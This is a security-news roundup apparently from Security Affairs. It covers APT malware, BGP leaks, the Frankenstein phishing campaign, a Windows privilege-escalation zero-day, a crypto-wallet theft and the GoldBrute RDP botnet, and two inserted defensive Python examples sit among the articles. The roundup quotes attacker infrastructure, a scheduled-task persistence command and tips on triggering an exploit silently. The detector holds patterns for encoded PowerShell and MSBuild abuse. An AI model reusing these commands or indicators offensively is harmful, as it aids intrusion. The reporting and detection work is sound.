The NightSt0rm team attempted to report the issue to Diebold Nixdorf but did not receive a reply.

At the time of writing, there is no news of attacks in the wild exploiting this RCE flaw.

Pierluigi Paganini

(SecurityAffairs – Diebold Nixdorf, ATM)

Facebook is going to stop Huawei pre-installing apps on mobile devices

Facebook announced it would stop Huawei from pre-installing social networking apps on its smartphones to comply with US sanctions.

Facebook announced it will no longer allow pre-installation of its social networking apps on Huawei smartphones to comply with the US ban on the Chinese tech giant.

“We are reviewing the Commerce Department’s final rule and the more recently issued temporary general license and taking steps to ensure compliance,” a Facebook spokesperson told AFP.

The decision will not affect customers who already own Huawei phones, but new devices will not have the Facebook, WhatsApp and Instagram apps pre-installed.

“Facebook Inc is no longer allowing pre-installation of its apps on Huawei phones, the latest blow for the Chinese tech giant as it struggles to keep its business afloat in the face of a U.S. ban on its purchase of American parts and software.” reported Reuters.

Facebook followed Google in the decision to ban the Chinese firm: Alphabet Inc’s Google recently announced the suspension of some business with Huawei after Trump’s ban on the telco giant.

Anyone who buys a new Huawei device will have no access to Google Android updates and no access to Google services, including the Google Play Store and the Gmail and YouTube apps.

Google confirmed that Huawei will only be able to use the public version of Android, the Android Open Source Project (AOSP), but users of the Chinese giant’s devices will not be able to access proprietary apps and services from Google.

Pierluigi Paganini

(SecurityAffairs – Huawei, Facebook)

Hunting the ICEFOG APT group after years of silence

A security researcher found new evidence of activities conducted by the ICEFOG APT group, also tracked by the experts as Fucobha.

Chi-en (Ashley) Shen, a senior security researcher at FireEye, collected evidence that demonstrates that China-linked APT group ICEFOG (aka Fucobha) is still active.

The activities of the APT group were first uncovered by Kaspersky Lab in September 2013. At the time, the researchers described the crew as an emerging group of cyber-mercenaries able to carry out surgical hit-and-run operations against strategic targets. The cyber-mercenaries were recruited by governments and private companies, and the group was composed of highly skilled hackers able to conduct sophisticated attacks.

The APT group is considered a persistent collector of sensitive information; the Kaspersky team detected a series of attacks against the defense supply chain (e.g. military contractors, shipbuilders, satellite operators, high-tech companies) in Japan and South Korea.

The Icefog team also targeted companies in the energy industry in the US; the threat actors used a custom backdoor dubbed “Fucobha”, which included exploits for both Microsoft Windows and Mac OS X.

At the time, the “hit and run” nature of the operations appeared unusual: the attackers processed victims rapidly, stealing only information of interest and showing a deep knowledge of the targets and of the information they were searching for.

The group went dark just after Kaspersky shared the findings of its investigation in September 2013.

This week, Chi-en (Ashley) Shen presented at the CONFidence cybersecurity conference held in Poland her analysis on new samples of malware associated with the ICEFOG group.

Two of them, tracked as ICEFOG-P and ICEFOG-M, have been used in targeted attacks in 2014 and 2018, respectively. Some samples for both variants have been compiled between 2014 and 2019.

Both ICEFOG-P and ICEFOG-M are more complex than the original backdoor, a circumstance that suggests the threat actors have continued to develop and use it.

ICEFOG-M is the latest variant: it is fileless malware that supports the same features as ICEFOG-P but uses HTTPS for its communications.

The researcher explained that the ICEFOG-P variant is not particularly complex; it remained under the radar simply because it was rarely used.

The researcher also spotted a Mac version of the malware, tracked as MacFog, that was previously unknown to the cyber security community. MacFog was initially distributed on Chinese forums.

Unlike the operations observed between 2011 and 2013, the new malware variants were involved in multiple campaigns conducted by different groups.

Shen spotted variants of the ICEFOG malware in attacks targeting:

  • an unnamed agriculture company in Europe in 2015
  • government, media, and finance organizations in Russia and Mongolia in 2015 (TOPNEWS campaign)
  • the government of multiple former Soviet states in 2015 (Roaming Tiger)
  • Kazakh officials in 2016 (APPER campaign)
  • water source provider, banks, and government entities in Turkey, India, Kazakhstan, Uzbekistan, and Tajikistan in 2018 (WATERFIGHT campaign)
  • an unknown entity in the Philippines in 2018 (PHKIGHT campaign)
  • organizations in Turkey and Kazakhstan in 2018 and 2019 (SKYLINE campaign)

In the latest campaign in 2019, tracked as the SKYLINE campaign, hackers targeted Turkey and Kazakhstan; the timestamps suggest the campaign may have been active since at least 2018. The attackers leveraged a shared CVE-2017-11882 exploit template and used a fileless version of ICEFOG-M.

According to Shen, most samples were involved in cyber espionage campaigns, and the threat actors appear to be politically motivated.

Below are the conclusions of the excellent analysis conducted by Shen:

  • ICEFOG is malware shared among Roaming Tiger, APT15, Temp Group A and suspected APT9.
  • Shared malware is a pitfall for attribution, we should not do attribution only based on malware.
  • Temp Group A is aggressively using ICEFOG-P and ICEFOG-M to target Russia, Kazakhstan, Tajikistan, Uzbekistan and Turkey.
  • With the file-less ICEFOG-M, host-based detection of payloads is more difficult.
  • Continued development indicates there could be more attacks leveraging ICEFOG in future campaigns, possibly by more attackers.

Pierluigi Paganini

(SecurityAffairs – cyberespionage, hacking)

Security Affairs 2019-06-08 07:37:33

German intelligence agencies could hack servers, smartphones and any other devices under a draft law drawn up by the German Interior Ministry.

Under a draft law drawn up by the German Interior Ministry, the German domestic and foreign intelligence services would be allowed to hack into computers and smartphones.

According to the draft law, the country’s intelligence agencies would be allowed, under specific circumstances, to intercept encrypted traffic to and from publishing companies, radio and television broadcasters, and freelance journalists. Of course, privacy advocates and human rights associations fear the Government could carry out a massive surveillance campaign.

“The intelligence services would also be empowered to intercept the encrypted communications of publishing companies, radio and television broadcasters and freelance journalists in certain cases, or to covertly search the digital data on their devices, meaning that they could also identify journalistic sources in the process.” reads a post published by the association Reporters Without Borders (RSF Germany).

Image caption (translated from German): The entrance to the headquarters of the Bundesnachrichtendienst (BND) in Pullach near Munich, photographed on Wednesday (10.05.06). Contrary to the original plans, the BND headquarters in Pullach will not be closed after all. The technical intelligence centre stays in Pullach with around 1,500 employees; the rest of the 6,000-strong workforce moves to Berlin. Photo: Johannes Simon/ddp

The law could also allow the authorities to identify journalistic sources, threatening the constitutionally guaranteed right to source protection.

The RSF Germany also issued a statement to explain how the law would hinder the journalistic activities in the country.

“If source protection is abolished, media professionals and their sources would lose the foundation for trusting cooperation. Interior Minister Horst Seehofer must put a stop to his ministry’s plans immediately,” said Christian Mihr, Executive Director of RSF Germany.

The authorities would be allowed to use spyware to compromise target devices and conduct so-called “online searches” (“Online-Durchsuchung”) to access the target’s data.

The power assigned to the German intelligence agencies is very dangerous, for example, they would be able to monitor journalistic activities by wiretapping encrypted communications between journalists and their sources.  

The domestic intelligence service would also be allowed to spy on German media, and in the most alarming scenario Germany’s foreign intelligence agency, the BND, would be authorized to hack into foreign media to conduct its investigations.

“Although the draft law foresees certain protective rights for journalists, in the case of foreign media in particular the obstacles the state authorities would face are comparatively trivial.” continues the post. “The BND would be empowered to hack foreign media to guarantee “Germany’s capacity to act”. So for example it would be allowed to hack into the servers of The Washington Post if this was deemed to serve Germany’s foreign policy interests.” 

German media outlets, broadcasters, and journalists are protesting against the Interior Ministry, and the Social Democratic Party has also announced its opposition to the plans.

Interior Minister Seehofer attempted to calm the journalists by explaining that the Government will continue to offer them ‘special’ protection.

According to RSF Germany, Germany currently ranks 13th out of 180 states on Reporters Without Borders’ Press Freedom Index; what will happen in the future?

Pierluigi Paganini

(SecurityAffairs – surveillance, German Intelligence)

Recently a large chunk of European mobile traffic was rerouted through China Telecom

On June 6, for more than two hours China Telecom re-routed through its infrastructure a large chunk of European mobile traffic.

In November, security researchers Chris C. Demchak and Yuval Shavitt published a paper detailing how China Telecom had been misdirecting Internet traffic through China over the past years. The experts speculated that these were intentional BGP hijacking attacks.

The term BGP hijacking is used to indicate the illegitimate takeover of groups of IP addresses by corrupting Internet routing tables maintained using the Border Gateway Protocol (BGP).

Now a new case involves China Telecom: on June 6, for more than two hours, a large chunk of European mobile traffic was rerouted through the infrastructure of the ISP.

China Telecom was originally a brand of the state-owned China Telecommunications Corporation; after the marketization of the enterprise, the brand and the operating companies were spun off as a separate group.

China Telecom is currently present in North American networks with 10 points-of-presence (PoPs) (eight in the United States and two in Canada), spanning major exchange points.

The latest incident was caused by the propagation of routing announcements beyond their intended scope, a so-called BGP route leak.

The BGP route leak involved the Swiss data center of the company Safe Host that accidentally leaked over 70,000 routes from its routing table to the Chinese ISP.

China Telecom did not discard the leaked routes; instead, it announced Safe Host’s routes as its own, which means that the traffic for many European mobile networks was re-routed through its network.

“Beginning at 09:43 UTC today (6 June 2019), Swiss data center colocation company Safe Host (AS21217) leaked over 70,000 routes to China Telecom (AS4134) in Frankfurt, Germany.” reads the analysis published by Oracle. “China Telecom then announced these routes on to the global internet redirecting large amounts of internet traffic destined for some of the largest European mobile networks through China Telecom’s network.”

Most impacted European networks included Swisscom (AS3303) of Switzerland, KPN (AS1130) of Holland, and Bouygues Telecom (AS5410) and Numericable-SFR (AS21502) of France.

The traffic was re-directed for over two hours and numerous leaked routes were more-specifics of routed prefixes, a circumstance that suggests the use of route optimizer technology.

Users of the affected mobile network experienced connection lagging and in some cases, they were not able to connect to some servers.

“Today’s incident shows that the internet has not yet eradicated the problem of BGP route leaks,” concludes Oracle.

“It also reveals that China Telecom, a major international carrier, has still implemented neither the basic routing safeguards necessary both to prevent propagation of routing leaks nor the processes and procedures necessary to detect and remediate them in a timely manner when they inevitably occur. Two hours is a long time for a routing leak of this magnitude to stay in circulation, degrading global communications.”

How can such attacks be prevented?

Security experts are pushing for the adoption of solutions that protect BGP; Cloudflare, for example, maintains that Resource Public Key Infrastructure (RPKI) could secure BGP routing.
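The two checks below, added here as an example rather than code from Oracle or Cloudflare, show what RPKI does and does not cover in an incident like this one: route origin validation against ROAs marks more-specifics that exceed a ROA's maxLength as invalid, while a leak that re-announces the covered prefix with its original origin still validates and is only caught by comparing against an established routing baseline. Prefixes, ROAs and AS paths are constructed; the AS numbers are those named in the article.

```python
import ipaddress
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional


@dataclass(frozen=True)
class ROA:
    """Route Origin Authorization: which AS may originate a prefix, and up to what length."""
    prefix: str
    max_length: int
    asn: int


def origin_validate(prefix: str, origin_asn: int, roas: Iterable[ROA]) -> str:
    """Simplified RPKI route origin validation (RFC 6811 outcomes):
    'valid' when a covering ROA authorizes this origin at this length,
    'invalid' when covering ROAs exist but none matches,
    'not-found' when no ROA covers the prefix at all."""
    net = ipaddress.ip_network(prefix, strict=False)
    covered = False
    for roa in roas:
        roa_net = ipaddress.ip_network(roa.prefix, strict=False)
        if roa_net.version != net.version or not net.subnet_of(roa_net):
            continue
        covered = True
        if roa.asn == origin_asn and net.prefixlen <= roa.max_length:
            return "valid"
    return "invalid" if covered else "not-found"


def covering_baseline(prefix: str, baseline: Dict[str, int]) -> Optional[str]:
    """Return the already-routed (baseline) prefix of which this announcement is a
    strict more-specific, or None. More-specifics of routed prefixes were the
    pattern Oracle observed in the 6 June leak."""
    net = ipaddress.ip_network(prefix, strict=False)
    for known in baseline:
        known_net = ipaddress.ip_network(known, strict=False)
        if (known_net.version == net.version
                and net.prefixlen > known_net.prefixlen
                and net.subnet_of(known_net)):
            return known
    return None


def assess(prefix: str, as_path: List[int], roas: Iterable[ROA],
           baseline: Dict[str, int]) -> Dict[str, object]:
    """Combine both checks for one announcement. The origin AS is the last AS in the path."""
    origin = as_path[-1]
    rov = origin_validate(prefix, origin, roas)
    parent = covering_baseline(prefix, baseline)
    return {
        "prefix": prefix,
        "origin": origin,
        "rov": rov,
        "more_specific_of": parent,
        # A leak that keeps the covered prefix and its original origin passes both
        # checks; catching it needs path validation, which is out of scope here.
        "suspicious": rov == "invalid" or parent is not None,
    }


# Constructed data: RFC 5737 documentation prefixes; AS numbers are those named in the article.
SAMPLE_ROAS = [
    ROA("203.0.113.0/24", 24, 3303),   # Swisscom, constructed prefix
    ROA("192.0.2.0/24", 24, 1130),     # KPN, constructed prefix
]
BASELINE = {"203.0.113.0/24": 3303, "192.0.2.0/24": 1130}
SAMPLE_ANNOUNCEMENTS = [
    ("203.0.113.0/24", [4134, 21217, 3303]),   # leaked via Safe Host and China Telecom, origin intact
    ("203.0.113.0/25", [4134, 21217, 3303]),   # route-optimizer style more-specific, beyond maxLength
    ("192.0.2.0/24", [4134, 4134]),            # origin replaced by AS4134
    ("198.51.100.0/24", [4134, 21217, 5410]),  # Bouygues, no ROA published
]

if __name__ == "__main__":
    for announced_prefix, path in SAMPLE_ANNOUNCEMENTS:
        print(assess(announced_prefix, path, SAMPLE_ROAS, BASELINE))
```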

Pierluigi Paganini

(SecurityAffairs – BGP hijacking, China Telecom)

Frankenstein campaign: threat actors put together open-source tools for highly-targeted attacks

Cisco Talos experts uncovered a new wave of attacks tracked as Frankenstein campaign, attackers used tools built by combining four open-source techniques.

Security experts at Cisco Talos uncovered a series of highly targeted attacks, tracked as the Frankenstein campaign, in which hackers used tools built by combining four different open-source techniques.

Attackers behind the Frankenstein campaign carried out several malware-based attacks between January and April 2019. Talos researchers found only a low volume of the related documents in various malware repositories.

“Cisco Talos recently identified a series of documents that we believe are part of a coordinated series of cyber attacks that we are calling the Frankenstein campaign.” reads the analysis published by Cisco Talos. “We assess that this activity was hyper-targeted given that there was a low volume of these documents in various malware repositories. Frankenstein — the name refers to the actors’ ability to piece together several unrelated components — leveraged four different open-source techniques to build the tools used during the campaign.”

Researchers at Talos team believe the attackers are moderately sophisticated but highly resourceful.

The attackers used multiple anti-detection techniques such as checking to see if any analysis tools, such as Process Explorer, were running in the background and determining whether the malicious code was running in a virtualized environment.

Other anti-detection techniques included responding only to GET requests that contained predefined fields, and using encryption to protect data in transit.

Talos experts identified two weaponized Word documents used in the Frankenstein campaign that were likely sent to the victims via email. The first document, named “MinutesofMeeting-2May19.docx”, displays the national flag of Jordan; once opened, it fetches a remote template and triggers the CVE-2017-11882 exploit to execute code on the target machine.

“Once the victim opens the document, it fetches a remote template from the actor-controlled website, hxxp://droobox[.]online:80/luncher.doc. Once the luncher.doc was downloaded, it used CVE-2017-11882, to execute code on the victim’s machine. After the exploit, the file would run a command script to set up persistence as a scheduled task named ‘WinUpdate’.” continues the analysis.

“‘/Create /F /SC DAILY /ST 09:00 /TN WinUpdate /TR’. That scheduled task would run a series of base64-encoded PowerShell commands that acted as a stager.”

The second sample prompts the victim to enable macros and run a Visual Basic script. 

One of the documents detected by the experts appears to be a document created by the security firm Kaspersky; in two other cases the attackers used documents specifically designed to target Middle Eastern entities.

Experts also described a

In the second scenario observed by Talos, threat actors used a weaponized document. When the macro is enabled, it executes a Visual Basic Application (VBA) script implementing two anti-analysis features. 

The script first queries Windows Management Instrumentation (WMI) to check if specific applications are running: VMWare, Vbox, Process Explorer, Process Hacker, ProcMon, Visual Basic, Fiddler, and WireShark. Then the script checks if specific tasks are running: VMWare, Vbox, VxStream, AutoIT, VMtools, TCPView, WireShark, Process Explorer, Visual Basic, and Fiddler. 

If the script finds one of the above apps or tasks, it halts its execution; otherwise it calls WMI to determine the number of cores allocated to the system and exits if the number of cores is less than two.

Once the evasion checks were complete, the attackers used MSBuild to execute an actor-created file named “LOCALAPPDATA\Intel\instal.xml”. According to Talos, the threat actors chose MSBuild because it is a signed Microsoft binary, which allows it to bypass application whitelisting controls on the host when it is used to execute arbitrary code.

Attackers used a PowerShell Empire agent to gather information on the local system, including Username, Domain name, Machine name, Public IP address, administrative privileges, currently running processes, operating system version, and the security system’s SHA256 HMAC. 

Then the data is sent back to the C&C server via an encrypted channel.
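Added here as a defensive example (not Talos code and not the campaign's own tooling): a Python detector that runs over constructed process-creation records and flags the three behaviours described above, an Office application spawning a living-off-the-land binary, schtasks creating a task that runs base64-encoded PowerShell, and MSBuild executing a project file from a user-writable AppData\Local path; it also decodes the -EncodedCommand argument so an analyst can read the stager. The record format, the user path and the placeholder stager text are constructed.

```python
import base64
import re
from typing import Dict, List, Optional


def parse_event(line: str) -> Dict[str, str]:
    """Parse one constructed 'Key=Value|Key=Value' process-creation record."""
    fields = {}
    for chunk in line.split("|"):
        key, _, value = chunk.partition("=")
        fields[key.strip()] = value.strip()
    return fields


# powershell -enc / -EncodedCommand takes base64 of the UTF-16LE script text.
ENCODED_ARG = re.compile(r"(?i)-enc(?:odedcommand)?\s+([A-Za-z0-9+/=]+)")


def extract_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the plaintext of an -EncodedCommand argument, or None if absent/undecodable."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


OFFICE_APPS = ("winword.exe", "excel.exe", "powerpnt.exe")
LOLBINS = ("schtasks.exe", "msbuild.exe", "cmd.exe", "powershell.exe")


def detect(event: Dict[str, str]) -> List[str]:
    """Return the names of the rules an event matches (empty list if none)."""
    img = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    cmd = event.get("CommandLine", "").lower()
    hits = []
    # Persistence: schtasks creating a task whose action is encoded PowerShell (the "WinUpdate" stager).
    if (img.endswith("schtasks.exe") and "/create" in cmd
            and "powershell" in cmd and ENCODED_ARG.search(cmd)):
        hits.append("schtasks-encoded-powershell")
    # Execution: MSBuild building a project file dropped under AppData\Local.
    if img.endswith("msbuild.exe") and "\\appdata\\local\\" in cmd and ".xml" in cmd:
        hits.append("msbuild-localappdata-project")
    # Delivery: an Office application spawning a living-off-the-land binary.
    if parent.endswith(OFFICE_APPS) and img.endswith(LOLBINS):
        hits.append("office-spawned-lolbin")
    return hits


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Run all rules over the records; include the decoded stager where one is present."""
    findings = []
    for n, line in enumerate(lines, start=1):
        event = parse_event(line)
        hits = detect(event)
        if hits:
            findings.append({"line": n, "hits": hits,
                             "decoded": extract_encoded_command(event.get("CommandLine", ""))})
    return findings


# Constructed sample: a harmless placeholder stands in for the real stager.
STAGER_PLAINTEXT = "Write-Output 'constructed stager placeholder'"
ENCODED = base64.b64encode(STAGER_PLAINTEXT.encode("utf-16-le")).decode("ascii")
OFFICE = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
SAMPLE_EVENTS = [
    r"Image=" + OFFICE + r"|ParentImage=C:\Windows\explorer.exe|CommandLine=WINWORD.EXE MinutesofMeeting-2May19.docx",
    r"Image=C:\Windows\System32\cmd.exe|ParentImage=" + OFFICE + r"|CommandLine=cmd /c setup.cmd",
    r"Image=C:\Windows\System32\schtasks.exe|ParentImage=C:\Windows\System32\cmd.exe"
    r"|CommandLine=schtasks /Create /F /SC DAILY /ST 09:00 /TN WinUpdate /TR powershell -enc " + ENCODED,
    r"Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe|ParentImage=" + OFFICE
    + r"|CommandLine=MSBuild.exe C:\Users\alice\AppData\Local\Intel\instal.xml",
    r"Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    r"|ParentImage=C:\Program Files\Microsoft Visual Studio\devenv.exe|CommandLine=MSBuild.exe C:\src\app\app.csproj",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```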

“A campaign that leverages custom tools is more easily attributed to the tools’ developers. One example of this was the code overlap in the VPNFilter malware that allowed us to associate the activity with the BlackEnergy malware.” Talos concludes. “By contrast, operations performed with open-source frameworks are extremely difficult to attribute without additional insights or intelligence.”

Pierluigi Paganini

(SecurityAffairs – Frankenstein campaign, hacking)

Fort Worth IT Professionals Fired for Reporting Cybersecurity Issues: What We Know

In October 2017, the city of Fort Worth, Texas became the target of a phishing scam.

Their accounts payable department received an email that appeared to be from Imperial Construction, a company that was doing business with the city at the time. The sender of the email, later identified as Gbenga A. Fadipe, requested a change of account.

The scam email prompted the department to change an electronic deposit from Plains Capital Bank to a different account with Chase Bank. Given the convincing nature of the email, the request received approval. The city’s accounts payable department believed that Imperial Construction had simply changed banks.

However, this wasn’t the case. Fadipe had planned the cyberattack to gain access to city accounts. According to the arrest warrant affidavit, he withdrew thousands of dollars between November 2017 and January 2018 from the new account with Chase Bank, severely compromising the cybersecurity of Fort Worth.

City officials responded, claiming that Fort Worth “had been the victim of fraud in late 2017 when, due to human error, a vendor payment was redirected to a bad actor.” As of now, Tarrant County has charged Fadipe with theft of property greater than $300,000, though the true cost of the scam is much higher. The injustice might have ended here, were it not for the events that transpired shortly afterwards.

Retaliation Against Whistleblowers

Fort Worth’s former IT manager, William Birchett, went to officials with concerns over the state of their cybersecurity following the attack. He made several claims, including that the city had left the medical and personal information of their employees accessible to anyone with internet access.

Birchett also brought attention to how the city had lied about its compliance with FBI crime database regulations. He reported his findings and submitted a proposal to Kevin Gunn, the city’s acting chief financial officer. Birchett also went to Roger Wright, the city’s acting chief technology officer.

Instead of moving forward with the changes, city officials fired Birchett in retaliation. They would later fire one of Birchett’s coworkers, Ronald Burke, who had previously supervised him. Both men have since filed whistleblower lawsuits against the city, with representation from attorney Stephen Kennedy.

Burke has also claimed the city retaliated against him for reporting issues with their cybersecurity and compliance with federal regulations. Like Birchett, Burke is seeking more than $1 million from the city of Fort Worth, which is “fully prepared to defend itself,” according to a recent statement from officials.

Response From Fort Worth Officials

In response to the allegations from Birchett and Burke, city officials said, “The people who have filed these suits were responsible for managing the very security items that they are now criticizing…” Officials went on to say they resolved the problem with their employee data “immediately,” but this is not the case.

Stephen Kennedy responded to the attempt by city officials to address the controversy, saying, “The City is not being forthright when it claims that it ‘immediately’ resolved issues concerning preservation of the City employees’ medical data information, unless your definition of the word immediate means six months…”

Birchett and Burke have provided additional insight into the city’s negligence. They allege that they repeatedly reported on problems with Fort Worth’s cybersecurity and compliance with federal Criminal Justice Information Services regulations. Despite their efforts, city officials refused to take action.

The behavior of Kevin Gunn, Robert Wright and other Fort Worth officials is indicative of a larger problem than the phishing scam with Imperial Construction. It shows a pattern of irresponsibility and neglect that goes back farther than 2017. Even with access to potential solutions, officials failed to act.

The Importance of Transparency

The decision to retaliate against whistleblowers is often counterproductive. In this instance, the city of Fort Worth was attempting to suppress information, but the firing of Birchett and Burke only brought that information to the surface. Though city officials tried to ignore the flaws in their system, the flaws only intensified.

This speaks to the importance of individuals like William Birchett and Ronald Burke. Without the courage of whistleblowers, an organization with illicit practices can continue to grow. Even if that organization retaliates, whistleblowers have protection under the law and can trust in the justice system to serve its purpose.

As context, OSHA’s Whistleblower Protection Program enforces the provisions in more than twenty whistleblower statutes, protecting employees in the healthcare, airline and food safety industries, among other sectors. In short, those who come forward with information about a company can expect fair treatment.

Looking Toward the Future

Gbenga A. Fadipe’s phishing scam revealed far more about the city of Fort Worth than anticipated. What started with a fraudulent email quickly transformed into something else, and now, Birchett and Burke are set to move forward with their individual lawsuits against the city. As the situation unfolds, it will likely have implications outside the state of Texas.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com.

Pierluigi Paganini

(SecurityAffairs – cybersecurity, hacking)

SandboxEscaper releases Byebear exploit to bypass patched EoP flaw

SandboxEscaper publicly disclosed a second Windows zero-day exploit dubbed ByeBear to bypass a recently patched elevation of privilege issue.

SandboxEscaper is a well of never-ending surprises: today she publicly disclosed a second Windows zero-day exploit (dubbed ByeBear) to bypass a recently patched elevation of privilege issue.

SandboxEscaper is a well-known researcher who has publicly disclosed several zero-day exploits for unpatched Windows flaws. At the end of May, she disclosed four Microsoft zero-day flaws in just 24 hours.

One of the flaws could be exploited by an attacker to bypass an elevation of privilege issue in Windows. The flaw, tracked as CVE-2019-0841, had already been patched; it affects the way the Windows AppX Deployment Service (AppXSVC) handles hard links.

Evidently, the fix did not completely solve the problem, because SandboxEscaper has now developed a new exploit that triggers the flaw and bypasses the Microsoft security patch.

The researcher explained that a specially crafted malicious application could be used to escalate its privileges and take complete control of a Windows machine.

Below is a video PoC for the ByeBear exploit, which abuses the Microsoft Edge browser to write a discretionary access control list (DACL) with SYSTEM privileges.

“It’s going to increase the thread priority to increase our odds of winning the race condition that this exploits. If your VM freezes, it means you either have 1 core or set your VM to have multiple processors instead of multiple cores… which will also cause it to lock up,” wrote SandboxEscaper.

“This bug is most definitely not restricted to the edge. This will be triggered with other packages too. So you can definitely figure out a way to trigger this bug silently without having edge pop up. Or you could probably minimize edge as soon as it launches and close it as soon as the bug completes.”

“I think it will also trigger by just launching edge once, but sometimes you may have to wait for a little. I didn’t do extensive testing…found this bug and quickly wrote up a PoC, took me like 2 hours total, finding LPEs is easy.”

In August 2018, SandboxEscaper disclosed a first zero-day privilege escalation vulnerability affecting Microsoft’s Windows operating systems.

In 2018, SandboxEscaper publicly dropped exploits for two other Windows zero-day vulnerabilities, forcing Microsoft to quickly address them to avoid its users being targeted by hackers.

In October, SandboxEscaper released proof-of-concept exploit code for a flaw in the Microsoft Data Sharing service that allowed a low-privileged user to delete critical system files on Windows systems.

In December, she published proof-of-concept (PoC) code for a new Windows zero-day, the fourth she had released that year.

Microsoft plans to release its Patch Tuesday security updates for June on June 11, and experts believe they will address the ByeBear zero-day and the four previous exploits disclosed by the researcher.

Pierluigi Paganini

(SecurityAffairs – ByeBear, hacking)


Crooks stole about $10 million from GateHub cryptocurrency wallet service

Cyber criminals stole 3.2 million Ripple coins (XRP), worth nearly $10 million, from the users of the GateHub cryptocurrency wallet service.

A new cyber heist made the headlines, crooks stole 3.2 million Ripple coins (XRP), worth nearly $10 million, from the users of the GateHub cryptocurrency wallet service.

“Recently, we have been notified by our customers and community members about funds on their XRP Ledger wallets being stolen and immediately started monitoring network activity and conducted an extensive internal investigation.” reads a preliminary statement published by GateHub.

“Although we have not identified any action or omission by GateHub that may have facilitated or allowed this apparent theft to occur, we apologize deeply to all of our customers for this issue and pledge to get to the bottom of it.”


The company speculates that the attackers might have abused its API to steal the funds. GateHub explained that each API request to the victims’ accounts was authorized with a valid access token. The company did not observe suspicious logins or evidence of brute-force attacks; however, its staff noticed an increased number of API calls using valid access tokens.

The suspicious requests originated from a limited number of IP addresses, likely controlled by the attackers. At the time of writing, it is still unclear how the attackers decrypted the secret keys. The company disabled all access tokens on June 1st.

“We have however detected an increased amount of API calls (with valid access tokens) coming from a small number of IP addresses which might be how the perpetrator gained access to encrypted secret keys,” continues the statement.

“That, however, still doesn’t explain how the perpetrator was able to gain other required information needed to decrypt the secret keys. All access tokens were disabled on June 1st after which the suspicious API calls were stopped.”

Thomas Silkjær, one of the community members who warned GateHub about the theft, published a report on the incident:

“On June 1 we were made aware of a theft of 201,000 XRP … and immediately started investigation. It turned out that the account robbed was managed through Gatehub.net, and that the offending account (r9do2Ar8k64NxgLD6oJoywaxQhUS57Ck8k) had stolen substantial amounts from several other XRP accounts, likely to be or have been managed through Gatehub.net.” reads the report.

The experts identified several other accounts connected to the cyber heist, for a total of 12 primary suspect accounts.

“From analysing access logs by victims and transactions made on the XRP ledger, it does not appear that any accounts were breached on gatehub.net directly, using client login credentials.” states the researcher.

The community member was not able to determine the root cause of the hack; he explored various options, including repeated nonces, bad practice in handling the RippleTrade migration of user accounts, browser client hacking, and the leak of an old database containing encrypted private keys.

GateHub immediately notified law enforcement; an investigation is still ongoing.

Pierluigi Paganini

(SecurityAffairs – hacking, GateHub)


New GoldBrute Botnet is attempting to infect 1.5 Million RDP Servers

A new botnet tracked as GoldBrute is scanning the web for Windows machines with Remote Desktop Protocol (RDP) connection enabled.

A new botnet tracked as GoldBrute has appeared in the threat landscape, it is scanning the web for Windows machines with Remote Desktop Protocol (RDP) connection enabled.

The botnet is currently targeting over 1.5 million unique endpoints online; it is used to brute-force RDP connections or to carry out credential stuffing attacks.

“This botnet is currently brute forcing a list of about 1.5 million RDP servers exposed to the Internet. Shodan lists about 2.4 million exposed servers [1]. GoldBrute uses its own list and is extending it as it continues to scan and grow.” wrote researcher Renato Marinho of Morphus Labs, who discovered the bot.

The GoldBrute botnet currently has a single command and control server (104[.]156[.]249[.]231), its bots exchange data with the C2 via AES encrypted WebSocket connections to port 8333. 

Querying the Shodan search engine for systems with RDP enabled it is possible to find roughly 2.4 million machines.

“An infected system will first be instructed to download the bot code. The download is very large (80 MBytes) and includes the complete Java Runtime. The bot itself is implemented in a Java class called GoldBrute” continues the expert.

“Initially, the bot will start scanning random IP addresses to find more hosts with exposed RDP servers. These IPs are reported back to the C&C server. After the bot reported 80 new victims, the C&C server will assign a set of targets to brute force to the bot.” 


Below is the complete attack chain:

  • The botnet brute-forces an RDP connection and gains access to a poorly protected Windows system.
  • It downloads a big zip archive containing the GoldBrute Java code and the Java runtime itself. It uncompresses and runs a jar file called “bitcoin.dll”.
  • The bot starts to scan the internet for “brutable” RDP servers and sends their IPs to the C2, which in turn sends back a list of IP addresses to brute-force.
  • The GoldBrute bot receives distinct “host + username + password” combinations.
  • The bot performs the brute-force attempt and reports the result back to the C2 server.

According to the researcher, the list of “brutable” RDP targets is rapidly growing, which suggests that the size of the botnet is also increasing.

“Analyzing the GoldBrute code and understanding its parameters and thresholds, it was possible to manipulate the code to make it save all “host + username + password” combinations on our lab machine.” continues the expert.

“After 6 hours, we received 2.1 million IP addresses from the C2 server from which 1,596,571 are unique. Of course, we didn’t execute the brute-force phase. With the help of an ELK stack, it was easy to geolocate and plot all the addresses in a global world map, as shown below.”

(Image: global map of the GoldBrute target addresses)

The GoldBrute botnet is difficult to detect because every bot only launches one password-guessing attempt per victim.

The report published by Marinho also includes a list of IoCs.

Pierluigi Paganini

(SecurityAffairs – GoldBrute botnet, hacking)


Cryptocurrency startup Komodo hacks itself to protect its users’ funds from hackers

The cryptocurrency startup Komodo hacked itself to protect the funds of its users and prevent hackers from stealing them by exploiting a flaw in its Agama wallet.

The story I’m going to tell you is amazing: the cryptocurrency startup Komodo hacked itself after discovering a backdoor in its Agama wallet.

Komodo’s Agama Wallet allows users to store KMD and BTC cryptocurrencies, but the presence of a backdoor posed a serious risk to them.


Once it discovered the flaw, the company decided to exploit it itself, beating the hackers to it and moving the funds to a secure location.

“Today, Komodo were made aware of an issue with one of the libraries used by the Agama wallet, potentially putting some user funds at risk.” reads a blog post published by the company.

“After discovering the vulnerability, our Cyber Security Team used the same exploit to gain control of a lot of affected seeds and secure the funds at risk.” 

